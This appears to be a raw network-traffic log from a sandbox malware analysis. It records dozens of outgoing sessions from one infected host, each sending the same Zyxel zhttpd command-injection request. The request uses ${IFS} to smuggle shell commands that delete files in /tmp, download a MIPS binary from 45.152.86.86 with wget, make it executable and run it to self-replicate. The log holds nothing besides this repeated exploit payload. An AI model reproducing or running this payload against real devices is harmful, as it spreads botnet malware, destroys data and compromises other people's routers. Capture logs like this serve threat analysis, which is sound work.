                                        Mar 31, 2024 09:21:03.640433073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3330192.168.2.234134223.40.249.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640500069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3331192.168.2.2348362162.97.223.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640563965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3332192.168.2.2340806182.171.248.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640642881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3333192.168.2.234195242.79.16.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640697002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3334192.168.2.2337720181.77.233.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640753984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3335192.168.2.2350546117.112.137.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640805006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3336192.168.2.2354980141.43.191.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640852928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3337192.168.2.235110844.198.208.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640897036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3338192.168.2.234873898.121.54.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640960932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3339192.168.2.235548072.172.119.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641019106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3340192.168.2.2342656123.212.154.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641077042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3341192.168.2.234014691.201.86.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641149998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3342192.168.2.2342974100.23.20.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641212940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3343192.168.2.2342034212.221.60.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641258955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3344192.168.2.2343122132.126.99.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641314983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3345192.168.2.2344382100.254.230.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641386032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3346192.168.2.233941669.100.120.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641439915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3347192.168.2.2341516155.71.236.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641511917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3348192.168.2.233729247.62.222.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641594887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3349192.168.2.2339718144.92.186.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641643047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3350192.168.2.2335782125.73.51.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641701937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3351192.168.2.2340600145.220.244.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641786098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3352192.168.2.2337146210.50.218.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641835928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3353192.168.2.23370149.8.57.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641870022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3354192.168.2.235953486.29.249.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.641954899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3355192.168.2.2357720115.204.228.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642003059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3356192.168.2.2353850213.49.41.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642069101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3357192.168.2.2353128116.135.195.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642105103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3358192.168.2.235703024.73.60.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642153025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3359192.168.2.235267872.34.136.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642187119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3360192.168.2.234127658.66.86.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642229080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3361192.168.2.235140446.187.175.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642293930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3362192.168.2.2346782123.161.33.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642379999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3363192.168.2.2358778161.20.150.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642437935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3364192.168.2.233323448.171.82.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642530918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3365192.168.2.233427653.69.52.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642594099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3366192.168.2.233971619.143.42.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642644882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3367192.168.2.2345564176.55.38.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642698050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3368192.168.2.235317045.135.94.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642769098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3369192.168.2.234096847.201.220.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642810106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3370192.168.2.2338412126.28.137.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642882109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3371192.168.2.235695250.47.251.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642935991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3372192.168.2.2356782148.5.248.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.642970085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3373192.168.2.2335974125.80.109.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643027067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3374192.168.2.2359310220.154.191.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643068075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3375192.168.2.2342910108.76.24.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643135071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3376192.168.2.233732854.57.210.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643205881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3377192.168.2.23417529.192.23.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643273115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3378192.168.2.234019031.108.37.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643327951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3379192.168.2.234223636.193.199.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643395901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3380192.168.2.234751485.106.78.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643475056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3381192.168.2.235697474.33.186.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643543005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3382192.168.2.2351096187.19.108.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643630028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3383192.168.2.235213468.134.155.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643682003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3384192.168.2.2359250117.62.135.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643758059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3385192.168.2.2359022151.24.223.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643805981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3386192.168.2.234814487.245.74.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643867016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3387192.168.2.2352042108.45.41.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643939972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3388192.168.2.2342922207.192.209.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.643996000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3389192.168.2.2342686154.108.19.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644047976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3390192.168.2.2353712118.239.87.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644099951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3391192.168.2.234054831.159.119.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644144058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3392192.168.2.234532862.232.251.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644196033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3393192.168.2.236086227.17.57.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644268990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3394192.168.2.2337704167.35.110.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644325972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3395192.168.2.235442819.56.183.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644385099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3396192.168.2.234551848.229.150.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.644431114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3397192.168.2.235518486.97.141.21443
                                        TimestampBytes transferredDirectionData
